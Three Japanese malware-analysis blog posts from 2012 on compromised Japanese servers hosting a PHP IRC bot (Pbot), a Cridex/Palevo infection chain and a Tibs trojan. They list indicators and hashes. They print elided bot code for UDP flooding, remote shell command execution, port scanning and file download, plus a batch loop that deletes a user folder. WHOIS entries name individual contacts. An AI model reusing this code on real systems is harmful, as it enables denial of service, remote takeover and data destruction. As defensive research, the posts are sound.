今回は「PHP/IRC PBOT」のマルウェアを発見しました。感染されたサーバは脆弱性があるかと思われます。
インジェクトされたファイルはテキストファイルですね、リモートから実行が出来る様に権限を設定されています。
本マルウェアはリモートIRCサーバに接続されて、DoS攻撃、ポートスキャナー、ファイルダウンロードと感染機能が持っています。
さっそく詳細情報を説明します↓
■感染されたサーバ/IP

oya2.net / 203.189.105.16 
■感染されたURLとダウンロード証拠↓

--20:22:17--  hxxp://oya2.net/mods/bt.php
           => `bt.php'
Resolving oya2.net... 203.189.105.16
Connecting to oya2.net|203.189.105.16|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
    ( <=>                                 ) 16,583        --.--K/s
20:22:17 (599.92 KB/s) - `bt.php' saved (16583) 
■ファイルの形とウイルススキャン結果↓

File name:       bt.php
File type:       PHP
MD5:             5faea9e683531ac2fbaeb3da4ac2b1d1
File size:       16.2 KB ( 16583 bytes )
Detection ratio: 17 / 42
Analysis date:   2012-05-14 11:36:02 UTC
Result:          [CLICK] 
■マルウェア種類↓

アファイル名 :「などなど.txt/jpg/gif/php」
ファイル種類  : テキスト
マルウェア種類: PHP SCRIPT/トロイバックドアIRC BOT
マルウェア名 : Backdoor.PHP.Ircbot
マルウェア機能: IRCバックドアDoS攻撃、ファイルダウンローダー、ポートスキャナー
■マルウェア名↓

// Mon May 14 21:01:35 JST 2012
nProtect     Backdoor.PHP.Ircbot.EF               
K7AntiVirus  Riskware                             
NOD32        PHP/IRCBot.NAN                       
F-Prot       PHP/Ircbot.K                         
Avast        PHP:IRCBot-AC [Trj]                  
ClamAV       PHP.Bot-1                            
BitDefender  Backdoor.PHP.Ircbot.EF               
F-Secure     Backdoor.PHP.Ircbot.EF               
VIPRE        Backdoor.PHP.IRCBot.bu (v)           
AntiVir      PHP/PBot.A                           
McAfee-GW:   Heuristic.BehavesLike.JS.Suspicious.G
Emsisoft     Backdoor.PHP.Pbot!IK                 
eTrust-Vet   PHP/IRCBot.KBE                       
Microsoft    Backdoor:PHP/IRCbot.F                
GData        Backdoor.PHP.Ircbot.EF               
Commtouch    PHP/Ircbot.K                         
Ikarus       Backdoor.PHP.Pbot                    
■マルウェアの説明↓

/// HASHコードが多い

ファイルは普通のテキストですが、沢山HASHコードが入っています、
アンチウイルス製品でスキャンしたら検知しにくい物です。
毎回MD5が変わるとの原因です。私は同じファイル同じタイミングで3回スキャンしたら…
3件の別々の結果が出ました↓

見た目は下記のように↓


下記はマルウェア機能の説明↓


/// PHP IRC BOT

<?php @set_time_limit(0); @error_reporting(0); class qNbZBbbnktqBTNNkB {
 :
 :
$this->mmVGpSV("NICK ".$str."");
}function PMpdsDMAYDA($to,$msg){
   $this->mmVGpSV("PRIVMSG $to :$msg");
}function YPggDp($chan,$key=NULL) 
{   $this->mmVGpSV("JOIN $chan $key"); 
}function DamVPspS($host) 
{   unset($this->users[$host]); 
///UDP FLOOD DoS

case "udpflood": 
   if(count($THTKBNNQZNzQWK)>3) 
   { 
      $this->GGyPGjMvyJMaaMgpds($THTKBNNQZNzQWK[1],$THTKBNNQZNzQWK[2],$THTKBNNQZNzQWK[3]); 
   } 
break;
 :
 :
function GGyPGjMvyJMaaMgpds($host,$packetsize,$time) {
$this->PMpdsDMAYDA($this->eqEWwKZnzKBebbt['ZwHkzbN'],"[\2UdpFlood Started!\2]"); 
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
 $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
 $i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->PMpdsDMAYDA($this->eqEWwKZnzKBebbt['ZwHkzbN'],"[\2UdpFlood Finished!\2]: 
$env MB enviados / Media: $vel MB/s ");
///INFECTED SVR'S SYSINFO

if(php_uname() == "") { $uname = "---"; } else { $uname = php_uname(); }
$this->mmVGpSV("USER ".$str."-w 127.0.0.1 localhost :".$uname."");
  :
  :
$unme = php_uname();
if($unme == "") { $mname = "\00315---\003"; }
else { $mname = "\00315".$unme."\003"; }
 $url = "\00315http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\003";
 $pth = "\00315".getcwd()."\003";
$pthh =  getcwd()."";
$perms = fileperms("$pthh");
if (($perms & 0xC000) == 0xC000) { $info = 's';
} elseif (($perms & 0xA000) == 0xA000) { $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) { $info = '-';
} elseif (($perms & 0x6000) == 0x6000) { $info = 'b';
} elseif (($perms & 0x4000) == 0x4000) { $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) { $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) { $info = 'p';
} else { $info = 'u'; }
/// REMOTE IRC CONTROLS

case "QUIT": 
   if($this->JGgDGYMMAaAm($cXiFLUu)) 
   { 
      $this->DamVPspS($cXiFLUu); 
   } 
break;    
case "PART": 
   if($this->JGgDGYMMAaAm($cXiFLUu)) 
   {    
      $this->DamVPspS($cXiFLUu);    
   }       
break;    
case "PRIVMSG": 
   if(!$this->JGgDGYMMAaAm($cXiFLUu) && (md5($roFufu) == $this->eq
   {    
      if(substr($THTKBNNQZNzQWK[0],0,1)==$this->eqEWwKZnzKBebbt['h   
      {       
         switch(substr($THTKBNNQZNzQWK[0],1))       
         {          
            case "user":
              :
              :
/// ARBITARY COMMAND EXECUTION

case "system": 
   $command = substr(strstr($IRC,$THTKBNNQZNzQWK[0]),strlen($THTKBNNQZNzQWK[0])+1); 
   $exec = system($command); 
   $ret = explode("\n",$exec); 
   for($i=0;$i<count($ret);$i++) 
      if($ret[$i]!=NULL) 
         $this->PMpdsDMAYDA($this->eqEWwKZnzKBebbt['ZwHkzbN'],"     
          : ".trim($ret[$i])); 
break;

$command = substr(strstr($IRC,$THTKBNNQZNzQWK[0]),strlen($THTKBNNQZNzQWK[0])+1); 
$exec = exec($command); 
$ret = explode("\n",$exec); 
for($i=0;$i<count($ret);$i++) 
   if($ret[$i]!=NULL) 
      $this->PMpdsDMAYDA($this->eqEWwKZnzKBebbt['ZwHkzbN'],"      
      : ".trim($ret[$i]));    
ak;      
e "sexec":
$command = substr(strstr($IRC,$THTKBNNQZNzQWK[0]),strlen($THTKBNNQZNzQWK[0])+1); 
$exec = shell_exec($command); 
$ret = explode("\n",$exec); 
for($i=0;$i<count($ret);$i++) 
   if($ret[$i]!=NULL) 
      $this->PMpdsDMAYDA($this->eqEWwKZnzKBebbt['ZwHkzbN'],"     
      : ".trim($ret[$i]));    
///PORTSCANNER

if(fsockopen($THTKBNNQZNzQWK[1],$THTKBNNQZNzQWK[2],$e,$s,15)) 
   $this->PMpdsDMAYDA($this->eqEWwKZnzKBebbt['ZwHkzbN'],"[\2pscan\2]:
    ".$THTKBNNQZNzQWK[1].":".$THTKBNNQZNzQWK[2]." is \2open\2"); 
else    
   $this->PMpdsDMAYDA($this->eqEWwKZnzKBebbt['ZwHkzbN'],"[\2pscan\2]: 
   ".$THTKBNNQZNzQWK[1].":".$THTKBNNQZNzQWK[2]." is \2closed\2")


///FILE DOWNLOADER

case "download": 
   if(count($THTKBNNQZNzQWK) > 2) 
   {    
      if(!$fp = fopen($THTKBNNQZNzQWK[2],"w"))    
      {        
         $this->PMpdsDMAYDA($this->eqEWwKZnzKBebbt['ZwHkzbN'],
         "[download:]\00314 Kon bestand niet downloaden. Toestemming geweigerd.");       
      }          
      else       
      {       
         if(!$get = file($THTKBNNQZNzQWK[1]))       
         {          
            $this->PMpdsDMAYDA($this->eqEWwKZnzKBebbt['ZwHkzbN'],
            "[download:]\00314 Kan bestand \2".$THTKBNNQZNzQWK[1]."\2 niet downloaden.");          
         }             
         else          
         {          
            for($i=0;$i<=count($get);$i++)          
            {             
               fwrite($fp,$get[$i]);             
            }                
            $this->PMpdsDMAYDA($this->eqEWwKZnzKBebbt['ZwHkzbN'],
            "[download:]\00314 Bestand \2".$THTKBNNQZNzQWK[1]."\2 gedownload naar \2".$THTKBNNQZNzQWK[2]."\2");             
         }             
         fclose($fp);          
      }          
   }      
   else { $this->PMpdsDMAYDA($this->eqEWwKZnzKBebbt['ZwHkzbN'],
   "[download:]\00314 Typ \".download http://your.host/file /tmp/file\""); }   
break; 
■感染されたサーバの情報(報告んも為に)

IP登録情報↓

IP:             203.189.105.16
inetnum:        203.189.105.0 - 203.189.105.255
netname:        COREVPS-NET
descr:          DigiRock, Inc.
country:        JP
admin-c:        KH9600JP
tech-c:         KH9600JP
changed:        apnic-ftp@nic.ad.jp 20110412
changed:        apnic-ftp@nic.ad.jp 20111206
source:         JPNIC
a. [JPNICハンドル]              KH9600JP
b. [氏名]                       平岩 健二
c. [Last, First]                Hiraiwa, Kenji
d. [電子メイル]                 jpnic@digi-rock.com
f. [組織名]                     株式会社デジロック
g. [Organization]               DIGIROCK,INC.
ドメイン登録↓

Domain name: oya2.net
Registrant Contact:
   DIGIROCK, INC.
   VALUE DOMAIN ()
   Chuo-ku Bakurou-cho 4-7-5
   Honmachi TS Building 6F
   Osaka-shi, Osaka-fu 541-0059   JP
Administrative Contact:
   DIGIROCK, INC.
   VALUE DOMAIN (wankoclub@zero.ad.jp)
   +81.662416585
   Fax: +81.662416586
   Chuo-ku Bakurou-cho 4-7-5
   Honmachi TS Building 6F
   Osaka-shi, Osaka-fu 541-0059   JP
インターネット・ルーティングのグラフ↓
---
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
Posted by unixfreaxjp at 8:44 午後 0 comments

日曜日, 5月 13, 2012

#OCJP-049: Wordpress脆弱性がある日本国内(九州)レンタルサーバにWorm/Cridex感染ファイル発見! 【対応最中】


今回はWormの感染の事件です。Exploit Pack(種類:Blackhole)から日本国内サーバに感染ファイル(infector HTML JavaScript)がインジェクトされました。それで感染URLが出来上がり、海外UPSスパムに乗せていたと確認しました。そのURLをクリックすると下記の写真ようにマルウェア軍団がパソコンに出来上がります↓

本件の行動分析調査は1日間、バイナリー調査数時間、FORENSICS調査もまた別途半日がかかりました。なお、テスト環境を戻すようにはリセットしか方法な無かったので、非常に危険さが高いマルウェアだと思われます。
感染の原因はまたWordPressの脆弱性経由だと思われます。
さて、下記は詳細情報です↓
■感染されたサーバ/IP↓

ipl2009.net / 218.219.133.2
■感染されたURLとダウンロード証拠↓

--06:42:02--  hxxp://ipl2009.net/wp-includes/usp.html
           => `usp.html'
Resolving ipl2009.net... 218.219.133.2
Connecting to ipl2009.net|218.219.133.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,231 (3.2K) [text/html]
100%[====================================>] 3,231         --.--K/s
06:42:03 (94.27 MB/s) - `usp.html' saved [3231/3231]
■ファイルの形と中身について↓

見た目は普通のHTMLファイルです↓
3231   May 11 02:44 usp.html
(サイズ) (日付け)   (ファイル名)

中身は↓

■マルウェア調査

1)Infector: usp.html

↑マルウェアのJavascriptが下記のスナップショット↓


↑特にそのままでSpiderMonkeyで実行したら解けるので、解けた時にのコード↓


実行されたら(危険!)下記のようにブラウザが見えます↓


このファイルのウイルススキャン結果↓
MD5:             e55918a185c78c93f89843bc78e4e0f3
File size:       3.2 KB ( 3231 bytes )
File name:       usp.html
File type:       HTML
Detection ratio: 7 / 42
Analysis date:   2012-05-12 22:03:59 UTC
Result: [CLICK]
2)ダウンローダー: wpbt0.dll.exe

上記のscriptで解けた結果にあるURLに行くと↓
--06:46:34--  hxxp://pe-canada.com/main.php?page=e5c375f8c497a582
           => `main.php@page=e5c375f8c497a582'
Resolving pe-canada.com... 37.59.68.23
Connecting to pe-canada.com|37.59.68.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
    [   <=>                               ] 18,784        33.14K/s
06:46:36 (33.09 KB/s) - `main.php@page=e5c375f8c497a582' saved [18784]

このファイルの中身はまたすごいコードが入っています↓


実行されたら見た目は下記のように↓


しかし、実はhtmlだけではなくて、下記のshellcodeも実行されますので、
外からマルウェアがダウンロードされます↓


↑このHTMLはマルウェアのダウンローダーファイルです、スキャンしたら下記の結果になります↓
MD5:             69cb029f4b244e2bdb94cb4196e60577
File size:       18.3 KB ( 18784 bytes )
File name:       main.php@page=e5c375f8c497a582
File type:       HTML
Detection ratio: 21 / 42
Analysis date:   2012-05-11 20:57:25 UTC
Result           [CLICK]
3)ダウンロードされたマルウェアに付いて

最終的にはパソコンに下記のマルウェアファイルがダウンロードされています↓


ウイルススキャンしたら、下記の結果となります↓
MD5:             09c2e6b42f7a7372bca7f36881b64d8c
File size:       134.1 KB ( 137296 bytes )
File name:       "xxxx.exe"
File type:       Win32 EXE
Detection ratio: 21 / 42
Analysis date:   2012-05-13 12:27:34 UTC 
Result:          [CLICK]
マルウェア名↓
F-Secure        : Trojan.Generic.KD.622010
NOD32           : Win32/AutoRun.Spy.Banker.M
Microsoft       : Worm:Win32/Cridex.B
VIPRE           : Trojan.Win32.Generic.pak!cobra
Norman          : W32/Troj_Generic.BTBWD
DrWeb           : Trojan.Inject1.3068
TrendMicro-House: TROJ_CLEAMAN.JDR
Avast           : Win32:Malware-gen
nProtect        : Trojan.Generic.KD.622010
GData           : Trojan.Generic.KD.622010
Kaspersky       : P2P-Worm.Win32.Palevo.errt
BitDefender     : Trojan.Generic.KD.622010
Emsisoft        : P2P-Worm.Win32.Palevo!IK
McAfee          : PWS-Zbot.gen.zh
Ikarus          : P2P-Worm.Win32.Palevo
TrendMicro      : TROJ_CLEAMAN.JDR
AhnLab-V3       : Worm/Win32.Palevo
AVG             : PSW.Generic9.CGJU
Sophos          : Mal/Cleaman-B
ViRobot         : Worm.Win32.P2P-Palevo.137296
Comodo          : TrojWare.Win32.Trojan.Agent.Gen

■マルウェア種類↓

アファイル  :「○○.exe」
マルウェア種類: トロイドロッパー、ワーム、PE/Win32マルウェア
マルウェア名 : CRIDEX 又は Palevo
マルウェア機能: 感染されたパソコンがロックされてしまう状況、セーフモードの機動が不可能
このマルウェアの調査結果は下記となります(分析迄書く時間が無くてごめんなさい)

1. 下記のマルウェアファイルを保存されます↓

C:\..\%AppData%\KB00420563.exe  09c2e6b42f7a7372bca7f36881b64d8c 137,296bytes
                 ↑payload!
C:\..\%Temp%\POS2.tmp.BAT       80fdd61cc6e90ba6dd8e341e5258e09e 177bytes
              ↑マルウェアSCRIPT
C:\..\%Temp%\Perflib_***.dat    ce338fe6899778aacfc28414f2d9498b 16,384bytes
       ↑(目的は不明)
C:\..\%Temp%\~DF2371.tmp        3974098c2ded7c29aef76b5a80d5dd89 180,224
        ↑バイナリーデータ
C:\..\%Temp%\~DF4206.tmp        3974098c2ded7c29aef76b5a80d5dd89 180,224
C:\..\%Temp%\~DF7F80.tmp        3974098c2ded7c29aef76b5a80d5dd89 180,224
C:\..\%Temp%\~DFAC92.tmp        3974098c2ded7c29aef76b5a80d5dd89 180,224
2. 下記のレジストリーバリューを追加されます↓

HKCU\..\Run: [KB00420563.exe] "C:\Documents and Settings\owner\Application Data\KB00420563.exe"
HKCU\Software\Microsoft\Windows Media Center\FBDC89D4(ランダム)
3. 下記のCMDコマンドが出ます↓

%Sytem%\CMD.EXE /C %TEMP%\POS2.tmp.BAT
4. POS2.tmp.BATのコードがマルウェア動きのコードです↓

@echo off
:R
del /F /Q /A "C:\Documents and Settings\owner\"
if exist "C:\Documents and Settings\owner\" goto R
del /F /Q /A "C:\DOCUME~1\owner\LOCALS~1\Temp\POS2.tmp.BAT" 
5. 調査のスクリーンショット↓

マルウェアファイルが実行された時↓


マルウェアファイルが削除されて、新しいファイルが保存されて、自動で実行された↓


そして自動実行マルウェアがdwwin.exeを実行してexplorer.exeがダウンさせます↓


新しいexplorer.exeが立ち上がって、マルウェアのCMD.EXEも立ち上がります↓


マルウェアのCMDコマンドラインを確認した時↓

ネットワーク調査結果↓

1. 下記のリモートサーバに接続依頼が投げてます↓
    DNSとHTTPでincompletesecuritysubmissions.ruへ接続依頼を投げたと確認しました。 
2. シミュレーションしたら443ポートで暗号化されたトラフィック送信を発見しました↓
  00000000 | 804C 0103 0000 3300 0000 1000 0004 0000 | .L....3.........
  00000010 | 0500 000A 0100 8007 00C0 0300 8000 0009 | ................
  00000020 | 0600 4000 0064 0000 6200 0003 0000 0602 | ..@..d..b.......
  00000030 | 0080 0400 8000 0013 0000 1200 0063 EDDB | .............c..
  00000040 | 3AF4 C388 79A9 F727 A297 1B7C 20E0      | :...y..'...| .  
  ※)↑恐らくincompletesecuritysubmissions.ruへ送信する目的です。
  ※)incompletesecuritysubmissions.ru既にダウンされた状況です。
■リファレンス↓

■感染されたサーバのネットワーク情報↓

ドメイン登録情報はお名前.COM↓
Domain Name: ipl2009.net
Created On: 2011-07-12 08:09:37.0
Last Updated On: 2012-04-06 11:20:44.0
Expiration Date: 2013-07-12 08:09:37.0
Status: ACTIVE
Registrant Name: Whois Privacy Protection Service by onamae.com
Registrant Organization: Whois Privacy Protection Service by onamae.com
Registrant Street1: 26-1 Sakuragaoka-cho
Registrant Street2: Cerulean Tower 11F
Registrant City: Shibuya-ku
Registrant State: 13
Registrant Postal Code: 150-8512
Registrant Country: JP
Registrant Phone: 03-0364-8727
IP/ネットワーク登録情報↓

a. [Network Number]             218.219.133.0/29
b. [Network Name]               123SERVER
g. [Organization]               123server
m. [Administrative Contact]     KM17473JP
n. [Technical Contact]          NS7235JP
[Assigned Date]                 2011/03/01
[Last Update]                   2011/03/01 15:41:03(JST)
   a. [JPNICハンドル] KM17473JP
   b. [氏名]         川副 政人
   c. [Last, First]  Masato, Kawazoe
   d. [電子メイル]   mkawazoe@fsi.co.jp
   f. [組織名]       123サーバー
   g. [Organization] 123server
   k. [部署]         九州DCディビジョン
   l. [Division]     Kyushu Data Center Division
   
   a. [JPNICハンドル] NS7235JP
   b. [氏名]         曽根崎 直人
   c. [Last, First]  Sonezaki, Naoto
   d. [電子メイル]   nsoneza@fsi.co.jp
   f. [組織名]       富士ソフト株式会社
   g. [Organization] FUJISOFT INCORPORATED
   k. [部署]         九州DCディビジョン
   l. [Division]     Kyushu Data Center Division
Less Specific Info.
----------
Kyushu Telecommunication Network Co., Inc.
                     [Allocation]  218.219.128.0/21
Kyushu Telecommunication Network Co., Inc.
        SUBA-249-A85 [Sub Allocation] 218.219.133.0/24

グラフ↓



【注意点】

感染されたサーバに同じIPでその他34ドメインが存在していますので、
もし、その他のドメインに同じwordpressの脆弱性があったら感染が増える可能性が出ます。
---
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
Posted by unixfreaxjp at 9:52 午後 1 comments

#OCJP-048:また脆弱性有りVPSサーバがマルウェアに感染されました 【対応最中】


今回の感染事件のマルウェアは「Tibs」トロイというマルウェアです。感染仕方はウェブのダウンロードですが、K-SHIELDでブロックされたスパムメールに本件のダウンロードサーバが日本にあると発見しました。申し訳ございませんが個人情報の関係でスパムメールの情報を今回は見せません。本マルウェアが実行されたらパソコンの情報が集まれて(メモリDUMPでの確認)、ニセSVCHOSTサービスが立ち上がります。目的は恐らくリモートのネットワーク接続迄かと思われますが、残念ながら全然ネットワークの動きが出れません。

さて、詳細情報は下記となります↓
■下記のホスト名/IP↓

www.bluefi.com / 210.188.199.218
■下記のURL とダウンロード証拠↓

--00:10:19--  hxxp://www.bluefi.com/images/2nd_menu_images/3.exe
=> `3.exe'
Resolving www.bluefi.com... 210.188.199.218
Connecting to www.bluefi.com|210.188.199.218|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 339,968 (332K) [application/octet-stream]
100%(====================================>) 339,968      897.11K/s
00:10:19 (894.43 KB/s) - `3.exe' saved (339968/339968) [/code]
■ファイルのスナップショット↓

Windows↓


UNIX Shell↓
 
■ウイルススキャン結果↓

File name:       3.exe
MD5:             8baa1ada1be347801b1773ea388c3226
File size:       332.0 KB ( 339968 bytes )
File type:       Win32 EXE
Detection ratio: 9 / 42
Analysis date:   2012-05-10 19:07:51 UTC
Result:          [CLICK]
[AntiVirus]              [Malware Name]
NOD32                    : a variant of Win32/Kryptik.AFIY
AntiVir                  : TR/FakeSysdef.AT
McAfee-GW-Edition        : Heuristic.LooksLike.Win32.Winwebsec.B
Emsisoft                 : Trojan.Win32.Tibs!IK
Kaspersky                : HEUR:Trojan.Win32.Generic
McAfee                   : FakeAlert-SysDef.ae
Ikarus                   : Trojan.Win32.Tibs
Symantec                 : Suspicious.Cloud.5
Microsoft                : Trojan:Win32/Tibs.IT 
■マルウェア種類の説明↓

アファイル  :「3.exe」
マルウェア種類: トロイ
マルウェア名 : Tibs、Kryptik
マルウェア機能: マルウェアドロッパー、バックドア
■マルウェア調査について

本マルウェアの調査はバイナリ調査、行動分析調査、FORENSICS調査、とリファレンス調査迄やりました。
あんまり長く書くと面白くないので、出来る限り短くにします。
少し調査のスナップショットを出すようにします。

1. バイナリー調査

// ファイルの情報↓
type    EXEC (Executable file)
os      windows
arch    i386
bits    32
endian  little
fd      6
size    0x53000
mode    r--
block   0x40

// どうやって作られたのか…
Compiled at: 0x4FAB484E [Thu May 10 04:47:10 2012 UTC]
Compiled by: Microsoft Visual C++ v6.0
CRC Failure: Claimed:  0 Actual:  379213
Packed by: Armadillo v1.71

バイナリーの中にある面白い$STRINGS

// にせ「.NET-based components登録内容」”マルウェアじゃないよ ”とのアピール
000000052B00 00000046C500  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
000000052B39 00000046C539  <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
000000052B84 00000046C584    <assemblyIdentity
000000052B99 00000046C599      type="win32"
000000052BAB 00000046C5AB      name="LFHR"
000000052BBC 00000046C5BC      version="7.4.7342.7346" 
000000052BDA 00000046C5DA      processorArchitecture="*"/>
000000052BFB 00000046C5FB    <dependency>
000000052C0B 00000046C60B      <dependentassembly>
000000052C24 00000046C624        <assemblyIdentity
000000052C3D 00000046C63D          type="win32"
000000052C53 00000046C653          name="Microsoft.Windows.Common-Controls"
000000052C85 00000046C685          version="6.0.0.0"
000000052CA0 00000046C6A0          publicKeyToken="6595b64144ccf1df"
000000052CCB 00000046C6CB          language="*"
000000052CE1 00000046C6E1          processorArchitecture="*"/>
000000052D06 00000046C706      </dependentAssembly>
000000052D20 00000046C720    </dependency>
000000052D31 00000046C731    <trustinfo xmlns="urn:schemas-microsoft-com:asm.v3">
000000052D69 00000046C769      <security>
000000052D79 00000046C779        <requestedprivileges>
000000052D96 00000046C796          <requestedExecutionLevel
000000052DB8 00000046C7B8            level="asInvoker"
000000052DD5 00000046C7D5            uiAccess="false"/>
000000052DF3 00000046C7F3          </requestedPrivileges>
000000052E13 00000046C813      </security>
000000052E24 00000046C824    </trustInfo>
000000052E34 00000046C834  </assembly>

// 恐らく暗号化されたメッセージというアピールですが、実はゴミっぽいです
000000051B10 00000046B510 ikahewfuiahiuewfhiauehfguiaweigaweiugwfhalerfgiluezshsegsaeir
             glasergaeskrgerjks
000000051B60 00000046B560  同じ↑
000000051BB0 00000046B5B0  同じ↑
 :
 :
000000052578 00000046BF78 kjwefkaewlaerwkanekrjfgalierfhaliweufhilewhfoiALEWBFHIULAewfil
             aweflwebhfukefihaejhfhaEUFaiuerfailuewfiuawefkjwefkaewlaerwkan
                          ekrjfgalierfhaliweufhilewhfoiALEWBFHIULAewfilaweflwebhfukefiha
                          ejhfhaEUFaiuerfailuewfiuawef
000000052650 00000046C050 同じ↑
000000052728 00000046C128 同じ↑

スナップショット↓


// 本ファイルの全てコール一覧が長いので、あやしいのコール一覧は下記のように↓
KERNEL32.dll.GetCommandLineA Hint[202] <----あやしい(大)
KERNEL32.dll.GetModuleHandleA Hint[294] <----あやしい(中)
KERNEL32.dll.GetStartupInfoA Hint[336]<----あやしい(小)
KERNEL32.dll.LeaveCriticalSection Hint[449]<----あやしい(小)
KERNEL32.dll.VirtualAllocEx Hint[700]<----あやしい(小)
KERNEL32.dll.EnterCriticalSection Hint[102]<----あやしい(小)

//ファイルの動き流れ↓

※もし本件のバイナリーを調査したい方々が居ると下記分析の地図を作ったので、
使ったほうがいいと思います。
<OCJP048.png>
見た目はこんな感じ↓


PS: 僕はlinuxで分析しましたので、windowsでpngが上手く見えない可能性があるかも知れないので、
  念のためにファイルを開く前に好きな画像フォーマットへコンバートして下さい。

本調査流れ的には↓
分析は難しくはないので、WinMainの所から始まって、ずっと最後迄に行くだけです。
これをやるとregisterを監視をすると動きは分かると思います。
結局APIを使って、システム情報を取られたり、ファイルのオペレーション
(削除、作る、コーピー)があり、
レジストリー書き込みと最後に長くループされて終了です。
問題はその流れよりも使ったDLLのコールが多いです、漏れがないように何回も再調査しました。
最終的な結果は行動分析調査に確認しましたので、詳しいの動きはそこで御確認下さい。
unixでマルウェア分析環境を未だ見た事が無い方々には私の調査したdesktop画像を取りました↓

2. 行動分析調査

本調査には、registryスナップショット、メモリ、プロセスdumpとwiresharkを取りながらやっていました。
環境はおもちゃのPC WinXPで使いまして、RATでのアクセス。
結果的には下記となります↓



// 機動のスナップショット↓
File '..\GnuWin32\bin\dump\OCJP-048\[sample]'
New process with ID 00000CC0 created
004037F4 Main thread with ID 000006E8 created
00400000 Module C:\Program Files\GnuWin32\bin\dump\OCJP-048\sample
4FEC0000 Module C:\WINDOWS\system32\ole32.dll
77280000 Module C:\WINDOWS\system32\SHLWAPI.dll
77BC0000 Module C:\WINDOWS\system32\msvcrt.dll
77CF0000 Module C:\WINDOWS\system32\USER32.dll
77D80000 Module C:\WINDOWS\system32\ADVAPI32.dll
77E20000 Module C:\WINDOWS\system32\kernel32.dll
77F50000 Module C:\WINDOWS\System32\ntdll.dll
78000000 Module C:\WINDOWS\system32\RPCRT4.dll
78090000 Module C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-..\COMCTL32.dll
7F000000 Module C:\WINDOWS\system32\GDI32.dll
762E0000 Module C:\WINDOWS\System32\IMM32.DLL
60740000 Module C:\WINDOWS\System32\LPK.DLL
72EF0000 Module C:\WINDOWS\System32\USP10.dll
004037F4 Program entry point
10000000 Module C:\WINDOWS\System32\OCMAPIHK.DLL

// 別途スナップショット↓
Base     Size     Entry    Name     File version     Path
00400000 0006D000 004037F4 sample                    C:\..\OCJP-048\sample
10000000 0000D000 10001F20 OCMAPIHK 9.0.2 (Build 242 C:\WINDOWS\System32\OCMAPIHK.DLL
4FEC0000 00126000 4FEDD8A7 ole32    5.1.2600.1720 (x C:\WINDOWS\system32\ole32.dll
60740000 00008000 60742C77 LPK      5.1.2600.1126 (x C:\WINDOWS\System32\LPK.DLL
72EF0000 0005A000 72F249BC USP10    1.0409.2600.1106 C:\WINDOWS\System32\USP10.dll
762E0000 0001C000 762E12A4 IMM32    5.1.2600.1106 (x C:\WINDOWS\System32\IMM32.DLL
77280000 00066000 77286414 SHLWAPI  6.00.2800.1740 ( C:\WINDOWS\system32\SHLWAPI.dll
77BC0000 00053000 77BCE94F msvcrt   7.0.2600.1106 (x C:\WINDOWS\system32\msvcrt.dll
77CF0000 0008C000 77D019A3 USER32   5.1.2600.1634 (x C:\WINDOWS\system32\USER32.dll
77D80000 0009B000 77D81D3D ADVAPI32 5.1.2600.1106 (x C:\WINDOWS\system32\ADVAPI32.dll
77E20000 00124000 77E29F51 kernel32 5.1.2600.1869 (x C:\WINDOWS\system32\kernel32.dll
77F50000 000A7000          ntdll    5.1.2600.1217 (x C:\WINDOWS\System32\ntdll.dll
78000000 00087000 78001E0D RPCRT4   5.1.2600.1361 (x C:\WINDOWS\system32\RPCRT4.dll
78090000 000E5000 7809EED4 COMCTL32 6.0 (xpsp2.06082 C:\WINDOWS\WinSxS\x86_Microsoft...\COMCTL32.dll
7F000000 00042000          GDI32    5.1.2600.1789 (x C:\WINDOWS\system32\GDI32.dll 

// runtimeライブラリー↓
0x74720000 0x0004C000 C:\WINDOWS\system32\MSCTF.dll  
0x76BF0000 0x0000B000 C:\WINDOWS\system32\PSAPI.DLL  
0x76C90000 0x00028000 C:\WINDOWS\system32\imagehlp.dll
0x77120000 0x0008B000 C:\WINDOWS\system32\OLEAUT32.dll
0x771B0000 0x000AA000 C:\WINDOWS\system32\WININET.dll
0x77A80000 0x00095000 C:\WINDOWS\system32\CRYPT32.dll
0x77B20000 0x00012000 C:\WINDOWS\system32\MSASN1.dll 
0x77C00000 0x00008000 C:\WINDOWS\system32\VERSION.dll
0x7C9C0000 0x00817000 C:\WINDOWS\system32\SHELL32.dll
0x7E1E0000 0x000A2000 C:\WINDOWS\system32\urlmon.dll 

その後下記の動きになります↓

// 下記のAPIコールを使いファイルを移動されます↓
0xd8 C:\TEST\sample.exe 0x408fd3 
MoveFileExW(lpExistingFileName: "C:\sample.exe", 
lpNewFileName: "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\YmRRz59lYQcnpo.exe.tmp", //←ランダムじゃない
dwFlags: 0x1)|0x1 

//同じ形で%temp%にバッカップが出ました↓
C:\Documents and Settings\owner\Local Settings\Temp\AIxsX8Aicn1wHn.exe.tmp //←ランダム
C:\Documents and Settings\owner\Local Settings\Temp\ez641g0oeo3wxF.exe.tmp
